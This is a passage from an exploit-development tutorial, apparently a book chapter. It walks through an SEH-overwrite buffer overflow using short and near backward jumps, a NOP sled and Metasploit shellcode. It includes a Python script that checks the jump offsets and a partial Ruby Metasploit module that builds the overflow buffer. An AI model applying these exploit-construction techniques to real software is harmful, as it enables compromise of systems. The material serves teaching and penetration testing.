Creating Your Own Exploits

209

When editing your exploit, be sure to adjust the initial buffer length as you make changes, or your alignment will be off. In this case, NSEH is being overwritten with the instructions to make a short five-byte jump backward (\xeb\xf9\x90\x90), where eb is the operation code for a short jump. The new lead buffer length is adjusted to 10,356 bytes, because these five new bytes come before the SEH overwrite.

When you run the exploit again and step through the instructions in the debugger, you should land in the 41s (hexadecimal As) before the exception handler values. The five INC ECX instructions should be replaced with the code to jump farther back into the initial buffer.

Now we'll change the exploit to include the "near jump" (\xe9\xdd\xd7\xff\xff) sequence of instructions, to jump backward to a location near the beginning of the buffer. Looking at the buffer (Figure 14-6), you can see that the entire string of As is completely intact, leaving more than 10,000 bytes available for shellcode. Since the average space required for functional shellcode is less than 500 bytes, this leaves you ample room.

Figure 14-6: Lots of room for shellcode

Now all you have to do is replace the buffer of 41s with NOPs (\x90) to give yourself a nice NOP slide to land in, and then you can sit back and let Metasploit take care of the shellcode.
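The alignment arithmetic in the two paragraphs above is worth checking by hand rather than trusting to the debugger alone. The following Python script is an added example, not code from the book or from the Metasploit module it describes: it decodes the two relative jumps quoted on this page (x86 JMP rel8, opcode EB, and JMP rel32, opcode E9) and computes where each lands within the buffer, assuming the layout the text gives (a 10,351-byte lead, then the 5-byte near jump, then the nSEH bytes). The function and constant names are the example's own.

```python
import struct

# Buffer layout described on this page. LEAD_LEN is the constant from the
# module fragment; the jump byte strings are the ones quoted in the text.
LEAD_LEN = 10351                          # NOP sled (minus encoded payload)
NEAR_JMP = b"\xe9\xdd\xd7\xff\xff"        # 5-byte near jump after the lead
NSEH = b"\xeb\xf9\x90\x90"                # nSEH overwrite: short jump + padding


def decode_relative_jump(code: bytes) -> tuple[int, int]:
    """Decode an x86 JMP rel8 (EB xx) or JMP rel32 (E9 xx xx xx xx).

    Returns (instruction_length, displacement). As the CPU computes it, the
    displacement is relative to the address of the *next* instruction.
    """
    opcode = code[0]
    if opcode == 0xEB:
        disp = struct.unpack("<b", code[1:2])[0]   # signed 8-bit
        return 2, disp
    if opcode == 0xE9:
        disp = struct.unpack("<i", code[1:5])[0]   # signed 32-bit, little-endian
        return 5, disp
    raise ValueError(f"not a relative JMP opcode: {opcode:#04x}")


def jump_target_offset(jmp_offset: int, code: bytes) -> int:
    """Buffer offset where execution lands after the jump located at jmp_offset."""
    length, disp = decode_relative_jump(code)
    return jmp_offset + length + disp


def describe_layout() -> dict:
    """Check the page's layout: nSEH's short jump must land on the near jump,
    and the near jump must land inside the NOP sled near the buffer start."""
    near_offset = LEAD_LEN                         # near jump follows the lead
    nseh_offset = near_offset + len(NEAR_JMP)      # nSEH follows the near jump
    return {
        "bytes_before_seh_overwrite": nseh_offset,             # 10356, as the text says
        "nseh_lands_at": jump_target_offset(nseh_offset, NSEH),  # should equal near_offset
        "near_lands_at": jump_target_offset(near_offset, NEAR_JMP),
    }


if __name__ == "__main__":
    for name, value in describe_layout().items():
        print(f"{name}: {value}")
```

Running it shows that \xeb\xf9 encodes a displacement of -7 from the end of the 2-byte instruction (5 bytes backward from its start, matching the text), and that the near jump's displacement of -10275 from the end of its 5-byte encoding lands at offset 81 of the buffer, well inside the NOP sled. Any change to the lead length that is not mirrored in the near jump displacement would move that landing point, which is exactly the alignment problem the first paragraph warns about.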

    def exploit
        connected = connect_login

        # NOP sled, shortened by the encoded payload length so the total stays aligned
        lead = "\x90" * (10351 - payload.encoded.length)

        # near jump backward into the NOP sled (5 bytes, placed before the SEH overwrite)
        near = "\xe9\xdd\xd7\xff\xff"

        # nSEH overwrite: short jump 5 bytes back onto the near jump, plus 2 NOPs of padding
        nseh = "\xeb\xf9\x90\x90"